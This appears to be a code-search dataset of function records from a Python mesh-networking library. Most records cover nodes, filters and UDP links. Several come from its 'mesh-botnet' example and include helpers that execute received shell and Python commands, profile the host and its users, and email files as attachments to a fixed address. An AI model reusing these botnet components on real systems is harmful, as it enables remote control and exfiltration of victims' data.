packet = interface.recv(self.mac_addr if not self.promiscuous else "00:00:00:00:00:00")
if packet:
self.recv(packet, interface)
time.sleep(0.01)
self.log("Stopped listening.")
### IO
def send(self, packet, interfaces=None):
"""write packet to given interfaces, default is broadcast to all interfaces"""
interfaces = interfaces or self.interfaces # default to all interfaces
interfaces = interfaces if hasattr(interfaces, '__iter__') else [interfaces]
for interface in interfaces:
for f in self.filters:
packet = f.tx(packet, interface) # run outgoing packet through the filters
if packet:
# if not dropped, log the transmit and pass it to the interface's send method
# self.log("OUT ", ("<"+",".join(i.name for i in interfaces)+">").ljust(30), packet.decode())
interface.send(packet)
|
pirate/mesh-networking | mesh/node.py | Node.send | python | def send(self, packet, interfaces=None):
interfaces = interfaces or self.interfaces # default to all interfaces
interfaces = interfaces if hasattr(interfaces, '__iter__') else [interfaces]
for interface in interfaces:
for f in self.filters:
packet = f.tx(packet, interface) # run outgoing packet through the filters
if packet:
# if not dropped, log the transmit and pass it to the interface's send method
# self.log("OUT ", ("<"+",".join(i.name for i in interfaces)+">").ljust(30), packet.decode())
interface.send(packet) | write packet to given interfaces, default is broadcast to all interfaces | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/node.py#L106-L117 | null | class Node(threading.Thread):
"""a Node represents a computer. node.interfaces contains the list of network links the node is connected to.
Nodes process incoming traffic through their filters, then place packets in their inq for their Program to handle.
Programs process packets off the node's incoming queue, then send responses out through node's outbound filters,
and finally out to the right network interface.
"""
def __init__(self, interfaces=None, name="n1", promiscuous=False, mac_addr=None, Filters=(), Program=None):
threading.Thread.__init__(self)
self.name = name
self.interfaces = interfaces or []
self.keep_listening = True
self.promiscuous = promiscuous
self.mac_addr = mac_addr or self._generate_MAC(6, 2)
self.inq = defaultdict(Queue) # TODO: convert to bounded ring-buffer
self.filters = [LoopbackFilter()] + [F() for F in Filters] # initialize the filters that shape incoming and outgoing traffic before it hits the program
self.program = Program(node=self) if Program else None # init the program that will be processing incoming packets
def __repr__(self):
return "[{0}]".format(self.name)
def __str__(self):
return self.__repr__()
@staticmethod
def _generate_MAC(segments=6, segment_length=2, delimiter=":", charset="0123456789abcdef"):
"""generate a non-guaranteed-unique mac address"""
addr = []
for _ in range(segments):
sub = ''.join(random.choice(charset) for _ in range(segment_length))
addr.append(sub)
return delimiter.join(addr)
def log(self, *args):
"""stdout and stderr for the node"""
print("%s %s" % (str(self).ljust(8), " ".join(str(x) for x in args)))
def stop(self):
self.keep_listening = False
if self.program:
self.program.stop()
self.join()
return True
### Runloop
def run(self):
"""runloop that gets triggered by node.start()
reads new packets off the link and feeds them to recv()
"""
if self.program:
self.program.start()
while self.keep_listening:
for interface in self.interfaces:
packet = interface.recv(self.mac_addr if not self.promiscuous else "00:00:00:00:00:00")
if packet:
self.recv(packet, interface)
time.sleep(0.01)
self.log("Stopped listening.")
### IO
def recv(self, packet, interface):
"""run incoming packet through the filters, then place it in its inq"""
# the packet is piped into the first filter, then the result of that into the second filter, etc.
for f in self.filters:
if not packet:
break
packet = f.tr(packet, interface)
if packet:
# if the packet wasn't dropped by a filter, log the recv and place it in the interface's inq
# self.log("IN ", str(interface).ljust(30), packet.decode())
self.inq[interface].put(packet)
|
pirate/mesh-networking | mesh/routers.py | chunk | python | def chunk(iterable, chunk_size=20):
items = []
for value in iterable:
items.append(value)
if len(items) == chunk_size:
yield items
items = []
if items:
yield items | chunk an iterable [1,2,3,4,5,6,7,8] -> ([1,2,3], [4,5,6], [7,8]) | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/routers.py#L1-L10 | null |
class MessageRouter(object):
node = None
routes = []
def route(self, pattern):
def wrapper(handler):
self.routes.append((pattern, handler))
return handler
return wrapper
def recv(self, program, message, interface=None):
def default_route(program, message=None, interface=None):
# print('Unrecognized Message msg: {0}'.format(message))
pass
# run through route patterns looking for a match to handle the msg
for pattern, handler in self.routes:
# if pattern is a compiled regex, try matching it
if hasattr(pattern, 'match') and pattern.match(message):
break
# if pattern is just a str, check for exact match
if message == pattern:
break
else:
# if no route matches, fall back to default handler
handler = default_route
handler(program, message, interface)
|
pirate/mesh-networking | mesh/filters.py | StringFilter.match | python | def match(cls, pattern, inverse=False):
string_pattern = pattern
invert_search = inverse
class DefinedStringFilter(cls):
pattern = string_pattern
inverse = invert_search
return DefinedStringFilter | Factory method to create a StringFilter which filters with the given pattern. | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/filters.py#L112-L120 | null | class StringFilter(BaseFilter):
"""Filter for packets that contain a string pattern.
Node('mynode', Filters=[StringFilter.match('pattern'), ...])
"""
def tr(self, packet, interface):
if not packet: return None
if not self.inverse:
return packet if self.pattern in packet else None
else:
return packet if self.pattern not in packet else None
@classmethod
@classmethod
def dontmatch(cls, pattern):
return cls.match(pattern, inverse=True)
|
pirate/mesh-networking | examples/mesh-botnet/shell_tools.py | run_cmd | python | def run_cmd(command, verbose=True, shell='/bin/bash'):
process = Popen(command, shell=True, stdout=PIPE, stderr=STDOUT, executable=shell)
output = process.stdout.read().decode().strip().split('\n')
if verbose:
# return full output including empty lines
return output
return [line for line in output if line.strip()] | internal helper function to run shell commands and get output | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/examples/mesh-botnet/shell_tools.py#L5-L12 | null | import sys
from io import StringIO
from subprocess import Popen, PIPE, STDOUT
def run_python(cmd, timeout=60):
"""interactively interpret recieved python code"""
try:
try:
buffer = StringIO()
sys.stdout = buffer
exec(cmd)
sys.stdout = sys.__stdout__
out = buffer.getvalue()
except Exception as error:
out = error
out = str(out).strip()
if len(out) < 1:
try:
out = "[eval]: "+str(eval(cmd))
except Exception as error:
out = "[eval]: "+str(error)
else:
out = "[exec]: "+out
except Exception as python_exception:
out = "[X]: %s" % python_exception
return out.strip()
def run_shell(cmd, timeout=60, verbose=False):
"""run a shell command and return the output, verbose enables live command output via yield"""
retcode = None
try:
p = Popen(cmd, shell=True, stdout=PIPE, stderr=STDOUT, executable='/bin/bash')
continue_running = True
except Exception as e:
yield("Failed: %s" % e)
continue_running = False
while continue_running:
try:
line = p.stdout.readline()
if verbose and line:
yield(line)
elif line.strip():
yield(line.strip())
except Exception:
pass
try:
data = irc.recv(4096)
except Exception as e:
data = ""
retcode = p.poll() # returns None while subprocess is running
if '!cancel' in data:
retcode = "Cancelled live output reading. You have to kill the process manually."
yield "[X]: %s" % retcode
break
elif retcode is not None:
try:
line = p.stdout.read()
except:
retcode = "Too much output, read timed out. Process is still running in background."
if verbose and line:
yield line
if retcode != 0:
yield "[X]: %s" % retcode
elif retcode == 0 and verbose:
yield "[√]"
break
|
pirate/mesh-networking | examples/mesh-botnet/shell_tools.py | run_python | python | def run_python(cmd, timeout=60):
try:
try:
buffer = StringIO()
sys.stdout = buffer
exec(cmd)
sys.stdout = sys.__stdout__
out = buffer.getvalue()
except Exception as error:
out = error
out = str(out).strip()
if len(out) < 1:
try:
out = "[eval]: "+str(eval(cmd))
except Exception as error:
out = "[eval]: "+str(error)
else:
out = "[exec]: "+out
except Exception as python_exception:
out = "[X]: %s" % python_exception
return out.strip() | interactively interpret recieved python code | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/examples/mesh-botnet/shell_tools.py#L14-L39 | null | import sys
from io import StringIO
from subprocess import Popen, PIPE, STDOUT
def run_cmd(command, verbose=True, shell='/bin/bash'):
"""internal helper function to run shell commands and get output"""
process = Popen(command, shell=True, stdout=PIPE, stderr=STDOUT, executable=shell)
output = process.stdout.read().decode().strip().split('\n')
if verbose:
# return full output including empty lines
return output
return [line for line in output if line.strip()]
def run_shell(cmd, timeout=60, verbose=False):
"""run a shell command and return the output, verbose enables live command output via yield"""
retcode = None
try:
p = Popen(cmd, shell=True, stdout=PIPE, stderr=STDOUT, executable='/bin/bash')
continue_running = True
except Exception as e:
yield("Failed: %s" % e)
continue_running = False
while continue_running:
try:
line = p.stdout.readline()
if verbose and line:
yield(line)
elif line.strip():
yield(line.strip())
except Exception:
pass
try:
data = irc.recv(4096)
except Exception as e:
data = ""
retcode = p.poll() # returns None while subprocess is running
if '!cancel' in data:
retcode = "Cancelled live output reading. You have to kill the process manually."
yield "[X]: %s" % retcode
break
elif retcode is not None:
try:
line = p.stdout.read()
except:
retcode = "Too much output, read timed out. Process is still running in background."
if verbose and line:
yield line
if retcode != 0:
yield "[X]: %s" % retcode
elif retcode == 0 and verbose:
yield "[√]"
break
|
pirate/mesh-networking | examples/mesh-botnet/shell_tools.py | run_shell | python | def run_shell(cmd, timeout=60, verbose=False):
retcode = None
try:
p = Popen(cmd, shell=True, stdout=PIPE, stderr=STDOUT, executable='/bin/bash')
continue_running = True
except Exception as e:
yield("Failed: %s" % e)
continue_running = False
while continue_running:
try:
line = p.stdout.readline()
if verbose and line:
yield(line)
elif line.strip():
yield(line.strip())
except Exception:
pass
try:
data = irc.recv(4096)
except Exception as e:
data = ""
retcode = p.poll() # returns None while subprocess is running
if '!cancel' in data:
retcode = "Cancelled live output reading. You have to kill the process manually."
yield "[X]: %s" % retcode
break
elif retcode is not None:
try:
line = p.stdout.read()
except:
retcode = "Too much output, read timed out. Process is still running in background."
if verbose and line:
yield line
if retcode != 0:
yield "[X]: %s" % retcode
elif retcode == 0 and verbose:
yield "[√]"
break | run a shell command and return the output, verbose enables live command output via yield | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/examples/mesh-botnet/shell_tools.py#L41-L86 | null | import sys
from io import StringIO
from subprocess import Popen, PIPE, STDOUT
def run_cmd(command, verbose=True, shell='/bin/bash'):
"""internal helper function to run shell commands and get output"""
process = Popen(command, shell=True, stdout=PIPE, stderr=STDOUT, executable=shell)
output = process.stdout.read().decode().strip().split('\n')
if verbose:
# return full output including empty lines
return output
return [line for line in output if line.strip()]
def run_python(cmd, timeout=60):
"""interactively interpret recieved python code"""
try:
try:
buffer = StringIO()
sys.stdout = buffer
exec(cmd)
sys.stdout = sys.__stdout__
out = buffer.getvalue()
except Exception as error:
out = error
out = str(out).strip()
if len(out) < 1:
try:
out = "[eval]: "+str(eval(cmd))
except Exception as error:
out = "[eval]: "+str(error)
else:
out = "[exec]: "+out
except Exception as python_exception:
out = "[X]: %s" % python_exception
return out.strip()
|
pirate/mesh-networking | examples/mesh-botnet/system_info.py | get_platform | python | def get_platform():
mac_version = str(platform.mac_ver()[0]).strip() # e.g. 10.11.2
if mac_version:
return 'OS X %s' % mac_version
return platform.platform().strip() | get Mac OS X version or kernel version if mac version is not found | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/examples/mesh-botnet/system_info.py#L9-L14 | null | import getpass
import platform
import socket
import uuid
from shell_tools import run_cmd
### System
# e.g. Darwin-15.4.0-x86_64-i386-64bit
def get_current_user():
"""guess the username this program is running under"""
return getpass.getuser()
def get_main_user():
"""guess the primary user of the computer who is currently logged in"""
# Guess main user by seeing who is currently running Finder.app
main_user = run_cmd("ps aux | grep CoreServices/Finder.app | head -1 | awk '{print $1}'")[0]
if not main_user or main_user == 'root':
# fallback to guess main user by seeing who owns the console file
main_user = run_cmd("stat -f '%Su' /dev/console")[0]
return main_user
def get_full_username(user):
"""sarah -> Sarah J. Connor"""
full_name = run_cmd("finger %s | awk -F: '{ print $3 }' | head -n1 | sed 's/^ //'" % user)[0]
return full_name or user
def get_hardware():
"""detailed hardware overview from system profiler"""
return run_cmd('system_profiler SPHardwareDataType', verbose=False)[1:]
def get_power():
"""detect whether computer is plugged in"""
return run_cmd("system_profiler SPPowerDataType | grep -q Connected && echo 'Connected' || echo 'Disconnected'")[0]
def get_uptime():
return run_cmd('uptime')[0]
### Networking
def get_hostname():
return socket.gethostname()
def get_local_ips():
"""parse ifconfig for all the computer's local IP addresses"""
local_ips = run_cmd(r"ifconfig -a | perl -nle'/(\d+\.\d+\.\d+\.\d+)/ && print $1'")
local_ips.remove('127.0.0.1')
return local_ips
def get_public_ip():
"""get the computer's current public IP by querying the opendns public ip resolver"""
return run_cmd('dig +short myip.opendns.com @resolver1.opendns.com')[0]
def get_mac_addr():
"""get the computer's current internet-facing MAC address"""
return ':'.join([
'{:02x}'.format((uuid.getnode() >> i) & 0xff)
for i in range(0,8*6,8)
][::-1])
def get_irc_nickname(full_name):
"""Sarah J. Connor -> [SarahJ.Connor]"""
return '[%s]' % full_name.replace(" ", "")[:14]
def get_location():
"""guess the computer's current geolocation based on IP address"""
# geo_info = geo_locate()
# location = geo_info[0]+", "+geo_info[1]+" ("+str(geo_info[4])+", "+str(geo_info[5])+")"
return 'Atlanta'
def add_gatekeeper_exception(app_path):
"""WARNING: big scary password prompt is shown to the current active user"""
return run_cmd('spctl --add "%s"' % app_path)
def lock_screen():
return run_cmd('/System/Library/CoreServices/Menu\ Extras/User.menu/Contents/Resources/CGSession -suspend')
def screensaver():
return run_cmd('open /System/Library/Frameworks/ScreenSaver.framework/Versions/A/Resources/ScreenSaverEngine.app')
|
pirate/mesh-networking | mesh/programs.py | BaseProgram.run | python | def run(self):
while self.keep_listening:
for interface in self.node.interfaces:
try:
self.recv(self.node.inq[interface].get(timeout=0), interface)
except Empty:
sleep(0.01) | runloop that reads packets off the node's incoming packet buffer (node.inq) | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/programs.py#L21-L28 | [
"def recv(self, packet, interface):\n \"\"\"overload this and put logic here to actually do something with the packet\"\"\"\n pass\n"
] | class BaseProgram(threading.Thread):
"""Represents a program running on a Node that interprets and responds to incoming packets."""
def __init__(self, node):
threading.Thread.__init__(self)
self.keep_listening = True
self.node = node
def stop(self):
self.keep_listening = False
self.join()
def recv(self, packet, interface):
"""overload this and put logic here to actually do something with the packet"""
pass
|
pirate/mesh-networking | examples/mesh-botnet/communication.py | email | python | def email(to='medusa@sweeting.me', _from=default_from, subject='BOT MSG', message="Info email", attachments=None):
for attachment in attachments or []:
filename = attachment.strip()
try:
result = run_cmd('uuencode %s %s | mailx -s "%s" %s' % (filename, filename, subject, to))[0]
return "Sending email From: %s; To: %s; Subject: %s; Attachment: %s (%s)" % (_from, to, subject, filename, result or 'Succeded')
except Exception as error:
return str(error)
if not attachments:
p = os.popen("/usr/sbin/sendmail -t", "w")
p.write("From: %s\n" % _from)
p.write("To: %s\n" % to)
p.write("Subject: %s\n" % subject)
p.write("\n") # blank line separating headers from body
p.write('%s\n' % message)
result = p.close()
if not result:
return "Sent email From: %s; To: %s; Subject: %s; Attachments: %s)" % (_from, to, subject, ','.join(attachments or []))
else:
return "Error: %s. Please fix Postfix:\n %s" % (result, help_str) | function to send mail to a specified address with the given attachments | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/examples/mesh-botnet/communication.py#L13-L35 | [
"def run_cmd(command, verbose=True, shell='/bin/bash'):\n \"\"\"internal helper function to run shell commands and get output\"\"\"\n process = Popen(command, shell=True, stdout=PIPE, stderr=STDOUT, executable=shell)\n output = process.stdout.read().decode().strip().split('\\n')\n if verbose:\n #... | import os
from shell_tools import run_cmd
from settings import HOSTNAME, MAIN_USER
default_from = '%s@%s' % (MAIN_USER, HOSTNAME)
help_str = """
sudo mkdir -p /Library/Server/Mail/Data/spool
sudo /usr/sbin/postfix set-permissions
sudo /usr/sbin/postfix start
"""
|
pirate/mesh-networking | mesh/links.py | VirtualLink.log | python | def log(self, *args):
print("%s %s" % (str(self).ljust(8), " ".join([str(x) for x in args]))) | stdout and stderr for the link | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/links.py#L54-L56 | null | class VirtualLink:
"""A Link represents a network link between Nodes.
Nodes.interfaces is a list of the [Link]s that it's connected to.
Some links are BROADCAST (all connected nodes get a copy of all packets),
others are UNICAST (you only see packets directed to you), or
MULTICAST (you can send packets to several people at once).
Some links are virtual, others actually send the traffic over UDP or IRC.
Give two nodes the same VirtualLink() object to simulate connecting them with a cable."""
broadcast_addr = "00:00:00:00:00:00:00"
def __init__(self, name="vlan1"):
self.name = name
self.keep_listening = True
# buffer for receiving incoming packets
self.inq = defaultdict(Queue) # mac_addr: [packet1, packet2, ...]
self.inq[self.broadcast_addr] = Queue()
### Utilities
def __repr__(self):
return "<%s>" % self.name
def __str__(self):
return self.__repr__()
def __len__(self):
"""number of nodes listening for packets on this link"""
return len(self.inq)
### Runloop
def start(self):
"""all links need to have a start() method because threaded ones use it start their runloops"""
self.log("ready.")
return True
def stop(self):
"""all links also need stop() to stop their runloops"""
self.keep_listening = False
# if threaded, kill threads before going down
if hasattr(self, 'join'):
self.join()
self.log("Went down.")
return True
### IO
def recv(self, mac_addr=broadcast_addr, timeout=0):
"""read packet off the recv queue for a given address, optional timeout to block and wait for packet"""
# recv on the broadcast address "00:..:00" will give you all packets (for promiscuous mode)
if self.keep_listening:
try:
return self.inq[str(mac_addr)].get(timeout=timeout)
except Empty:
return ""
else:
self.log("is down.")
def send(self, packet, mac_addr=broadcast_addr):
"""place sent packets directly into the reciever's queues (as if they are connected by wire)"""
if self.keep_listening:
if mac_addr == self.broadcast_addr:
for addr, recv_queue in self.inq.items():
recv_queue.put(packet)
else:
self.inq[mac_addr].put(packet)
self.inq[self.broadcast_addr].put(packet)
else:
self.log("is down.")
|
def stop(self):
    """all links also need stop() to stop their runloops"""
    self.keep_listening = False
    # threaded links have a join() method; wait for their runloop to exit first
    if hasattr(self, 'join'):
        self.join()
    self.log("Went down.")
    return True
"def log(self, *args):\n \"\"\"stdout and stderr for the link\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join([str(x) for x in args])))\n"
] | class VirtualLink:
"""A Link represents a network link between Nodes.
Nodes.interfaces is a list of the [Link]s that it's connected to.
Some links are BROADCAST (all connected nodes get a copy of all packets),
others are UNICAST (you only see packets directed to you), or
MULTICAST (you can send packets to several people at once).
Some links are virtual, others actually send the traffic over UDP or IRC.
Give two nodes the same VirtualLink() object to simulate connecting them with a cable."""
broadcast_addr = "00:00:00:00:00:00:00"
def __init__(self, name="vlan1"):
self.name = name
self.keep_listening = True
# buffer for receiving incoming packets
self.inq = defaultdict(Queue) # mac_addr: [packet1, packet2, ...]
self.inq[self.broadcast_addr] = Queue()
### Utilities
def __repr__(self):
return "<%s>" % self.name
def __str__(self):
return self.__repr__()
def __len__(self):
"""number of nodes listening for packets on this link"""
return len(self.inq)
def log(self, *args):
"""stdout and stderr for the link"""
print("%s %s" % (str(self).ljust(8), " ".join([str(x) for x in args])))
### Runloop
def start(self):
"""all links need to have a start() method because threaded ones use it start their runloops"""
self.log("ready.")
return True
### IO
def recv(self, mac_addr=broadcast_addr, timeout=0):
"""read packet off the recv queue for a given address, optional timeout to block and wait for packet"""
# recv on the broadcast address "00:..:00" will give you all packets (for promiscuous mode)
if self.keep_listening:
try:
return self.inq[str(mac_addr)].get(timeout=timeout)
except Empty:
return ""
else:
self.log("is down.")
def send(self, packet, mac_addr=broadcast_addr):
"""place sent packets directly into the reciever's queues (as if they are connected by wire)"""
if self.keep_listening:
if mac_addr == self.broadcast_addr:
for addr, recv_queue in self.inq.items():
recv_queue.put(packet)
else:
self.inq[mac_addr].put(packet)
self.inq[self.broadcast_addr].put(packet)
else:
self.log("is down.")
|
def recv(self, mac_addr=broadcast_addr, timeout=0):
    """read packet off the recv queue for a given address, optional timeout to block and wait for packet"""
    if not self.keep_listening:
        self.log("is down.")
        return
    # recv on the broadcast address "00:..:00" yields all packets (promiscuous mode)
    try:
        return self.inq[str(mac_addr)].get(timeout=timeout)
    except Empty:
        return ""
"def log(self, *args):\n \"\"\"stdout and stderr for the link\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join([str(x) for x in args])))\n"
] | class VirtualLink:
"""A Link represents a network link between Nodes.
Nodes.interfaces is a list of the [Link]s that it's connected to.
Some links are BROADCAST (all connected nodes get a copy of all packets),
others are UNICAST (you only see packets directed to you), or
MULTICAST (you can send packets to several people at once).
Some links are virtual, others actually send the traffic over UDP or IRC.
Give two nodes the same VirtualLink() object to simulate connecting them with a cable."""
broadcast_addr = "00:00:00:00:00:00:00"
def __init__(self, name="vlan1"):
self.name = name
self.keep_listening = True
# buffer for receiving incoming packets
self.inq = defaultdict(Queue) # mac_addr: [packet1, packet2, ...]
self.inq[self.broadcast_addr] = Queue()
### Utilities
def __repr__(self):
return "<%s>" % self.name
def __str__(self):
return self.__repr__()
def __len__(self):
"""number of nodes listening for packets on this link"""
return len(self.inq)
def log(self, *args):
"""stdout and stderr for the link"""
print("%s %s" % (str(self).ljust(8), " ".join([str(x) for x in args])))
### Runloop
def start(self):
"""all links need to have a start() method because threaded ones use it start their runloops"""
self.log("ready.")
return True
def stop(self):
"""all links also need stop() to stop their runloops"""
self.keep_listening = False
# if threaded, kill threads before going down
if hasattr(self, 'join'):
self.join()
self.log("Went down.")
return True
### IO
def send(self, packet, mac_addr=broadcast_addr):
"""place sent packets directly into the reciever's queues (as if they are connected by wire)"""
if self.keep_listening:
if mac_addr == self.broadcast_addr:
for addr, recv_queue in self.inq.items():
recv_queue.put(packet)
else:
self.inq[mac_addr].put(packet)
self.inq[self.broadcast_addr].put(packet)
else:
self.log("is down.")
|
def send(self, packet, mac_addr=broadcast_addr):
    """place sent packets directly into the receiver's queues (as if they are connected by wire)"""
    if not self.keep_listening:
        self.log("is down.")
        return
    if mac_addr == self.broadcast_addr:
        # broadcast: every listener on the link gets a copy
        for recv_queue in self.inq.values():
            recv_queue.put(packet)
    else:
        # unicast: deliver to the addressee plus the promiscuous broadcast queue
        self.inq[mac_addr].put(packet)
        self.inq[self.broadcast_addr].put(packet)
"def log(self, *args):\n \"\"\"stdout and stderr for the link\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join([str(x) for x in args])))\n"
] | class VirtualLink:
"""A Link represents a network link between Nodes.
Nodes.interfaces is a list of the [Link]s that it's connected to.
Some links are BROADCAST (all connected nodes get a copy of all packets),
others are UNICAST (you only see packets directed to you), or
MULTICAST (you can send packets to several people at once).
Some links are virtual, others actually send the traffic over UDP or IRC.
Give two nodes the same VirtualLink() object to simulate connecting them with a cable."""
broadcast_addr = "00:00:00:00:00:00:00"
def __init__(self, name="vlan1"):
self.name = name
self.keep_listening = True
# buffer for receiving incoming packets
self.inq = defaultdict(Queue) # mac_addr: [packet1, packet2, ...]
self.inq[self.broadcast_addr] = Queue()
### Utilities
def __repr__(self):
return "<%s>" % self.name
def __str__(self):
return self.__repr__()
def __len__(self):
"""number of nodes listening for packets on this link"""
return len(self.inq)
def log(self, *args):
"""stdout and stderr for the link"""
print("%s %s" % (str(self).ljust(8), " ".join([str(x) for x in args])))
### Runloop
def start(self):
"""all links need to have a start() method because threaded ones use it start their runloops"""
self.log("ready.")
return True
def stop(self):
"""all links also need stop() to stop their runloops"""
self.keep_listening = False
# if threaded, kill threads before going down
if hasattr(self, 'join'):
self.join()
self.log("Went down.")
return True
### IO
def recv(self, mac_addr=broadcast_addr, timeout=0):
"""read packet off the recv queue for a given address, optional timeout to block and wait for packet"""
# recv on the broadcast address "00:..:00" will give you all packets (for promiscuous mode)
if self.keep_listening:
try:
return self.inq[str(mac_addr)].get(timeout=timeout)
except Empty:
return ""
else:
self.log("is down.")
|
def _initsocket(self):
    """bind to the datagram socket (UDP), and enable BROADCAST mode"""
    def _udp_socket():
        # non-blocking UDP socket, shared setup for sender and receiver
        s = socket(AF_INET, SOCK_DGRAM)
        s.setblocking(0)
        return s

    self.send_socket = _udp_socket()
    self.send_socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)  # broadcast-capable sender

    self.recv_socket = _udp_socket()
    if IS_BSD:
        self.recv_socket.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1)  # requires sudo
    # allows multiple UDPLinks to all listen for UDP packets on the same port
    self.recv_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    self.recv_socket.bind(('', self.port))
"""This link sends all traffic as BROADCAST UDP packets on all physical ifaces.
Connect nodes on two different laptops to a UDPLink() with the same port and they will talk over wifi or ethernet.
"""
def __init__(self, name="en0", port=2016):
# UDPLinks have to be run in a seperate thread
# they rely on the infinite run() loop to read packets out of the socket, which would block the main thread
threading.Thread.__init__(self)
VirtualLink.__init__(self, name=name)
self.port = port
# self.log("starting...")
self._initsocket()
def __repr__(self):
return "<" + self.name + ">"
### Runloop
def run(self):
"""runloop that reads incoming packets off the interface into the inq buffer"""
# self.log("ready to receive.")
# we use a runloop instead of synchronous recv so stopping the node mid-recv is possible
read_ready = None
while self.keep_listening:
try:
read_ready, w, x = select.select([self.recv_socket], [], [], 0.01)
except Exception:
# catch timeouts
pass
if read_ready:
packet, addr = read_ready[0].recvfrom(4096)
if addr[1] == self.port:
# for each address listening to this link
for mac_addr, recv_queue in self.inq.items():
recv_queue.put(packet) # put packet in node's recv queue
else:
pass # not meant for us, it was sent to a different port
### IO
def send(self, packet, retry=True):
"""send a packet down the line to the inteface"""
addr = ('255.255.255.255', self.port) # 255. is the broadcast IP for UDP
try:
self.send_socket.sendto(packet, addr)
except Exception as e:
self.log("Link failed to send packet over socket %s" % e)
sleep(0.2)
if retry:
self.send(packet, retry=False)
|
def run(self):
    """runloop that reads incoming packets off the interface into the inq buffer

    Uses select() with a short timeout instead of a blocking recv so the
    thread can be stopped mid-receive by flipping self.keep_listening.
    """
    while self.keep_listening:
        # Reset every pass. Previously this was initialized once outside the
        # loop: a stale truthy value left over after a failed select() would
        # trigger recvfrom() on a socket that isn't actually readable, raising
        # an uncaught BlockingIOError and killing the thread.
        read_ready = []
        try:
            read_ready, _, _ = select.select([self.recv_socket], [], [], 0.01)
        except Exception:
            pass  # transient select() errors; just poll again
        if read_ready:
            packet, addr = read_ready[0].recvfrom(4096)
            if addr[1] == self.port:
                # fan the packet out to every address listening on this link
                for recv_queue in self.inq.values():
                    recv_queue.put(packet)
            # else: not meant for us, it was sent to a different port
"""This link sends all traffic as BROADCAST UDP packets on all physical ifaces.
Connect nodes on two different laptops to a UDPLink() with the same port and they will talk over wifi or ethernet.
"""
def __init__(self, name="en0", port=2016):
# UDPLinks have to be run in a seperate thread
# they rely on the infinite run() loop to read packets out of the socket, which would block the main thread
threading.Thread.__init__(self)
VirtualLink.__init__(self, name=name)
self.port = port
# self.log("starting...")
self._initsocket()
def __repr__(self):
return "<" + self.name + ">"
def _initsocket(self):
"""bind to the datagram socket (UDP), and enable BROADCAST mode"""
self.send_socket = socket(AF_INET, SOCK_DGRAM)
self.send_socket.setblocking(0)
self.send_socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self.recv_socket = socket(AF_INET, SOCK_DGRAM)
self.recv_socket.setblocking(0)
if IS_BSD:
self.recv_socket.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1) # requires sudo
self.recv_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # allows multiple UDPLinks to all listen for UDP packets
self.recv_socket.bind(('', self.port))
### Runloop
# not meant for us, it was sent to a different port
### IO
def send(self, packet, retry=True):
"""send a packet down the line to the inteface"""
addr = ('255.255.255.255', self.port) # 255. is the broadcast IP for UDP
try:
self.send_socket.sendto(packet, addr)
except Exception as e:
self.log("Link failed to send packet over socket %s" % e)
sleep(0.2)
if retry:
self.send(packet, retry=False)
|
def send(self, packet, retry=True):
    """send a packet down the line to the interface"""
    broadcast = ('255.255.255.255', self.port)  # 255.255.255.255 is the UDP broadcast IP
    try:
        self.send_socket.sendto(packet, broadcast)
    except Exception as e:
        self.log("Link failed to send packet over socket %s" % e)
        sleep(0.2)
        if retry:
            # one more attempt after a short pause, then give up
            self.send(packet, retry=False)
"def log(self, *args):\n \"\"\"stdout and stderr for the link\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join([str(x) for x in args])))\n",
"def send(self, packet, retry=True):\n \"\"\"send a packet down the line to the inteface\"\"\"\n addr = ('255.255.255.255', self.port) # 255. is the br... | class UDPLink(threading.Thread, VirtualLink):
"""This link sends all traffic as BROADCAST UDP packets on all physical ifaces.
Connect nodes on two different laptops to a UDPLink() with the same port and they will talk over wifi or ethernet.
"""
def __init__(self, name="en0", port=2016):
# UDPLinks have to be run in a seperate thread
# they rely on the infinite run() loop to read packets out of the socket, which would block the main thread
threading.Thread.__init__(self)
VirtualLink.__init__(self, name=name)
self.port = port
# self.log("starting...")
self._initsocket()
def __repr__(self):
return "<" + self.name + ">"
def _initsocket(self):
"""bind to the datagram socket (UDP), and enable BROADCAST mode"""
self.send_socket = socket(AF_INET, SOCK_DGRAM)
self.send_socket.setblocking(0)
self.send_socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self.recv_socket = socket(AF_INET, SOCK_DGRAM)
self.recv_socket.setblocking(0)
if IS_BSD:
self.recv_socket.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1) # requires sudo
self.recv_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # allows multiple UDPLinks to all listen for UDP packets
self.recv_socket.bind(('', self.port))
### Runloop
def run(self):
"""runloop that reads incoming packets off the interface into the inq buffer"""
# self.log("ready to receive.")
# we use a runloop instead of synchronous recv so stopping the node mid-recv is possible
read_ready = None
while self.keep_listening:
try:
read_ready, w, x = select.select([self.recv_socket], [], [], 0.01)
except Exception:
# catch timeouts
pass
if read_ready:
packet, addr = read_ready[0].recvfrom(4096)
if addr[1] == self.port:
# for each address listening to this link
for mac_addr, recv_queue in self.inq.items():
recv_queue.put(packet) # put packet in node's recv queue
else:
pass # not meant for us, it was sent to a different port
### IO
|
def run(self):
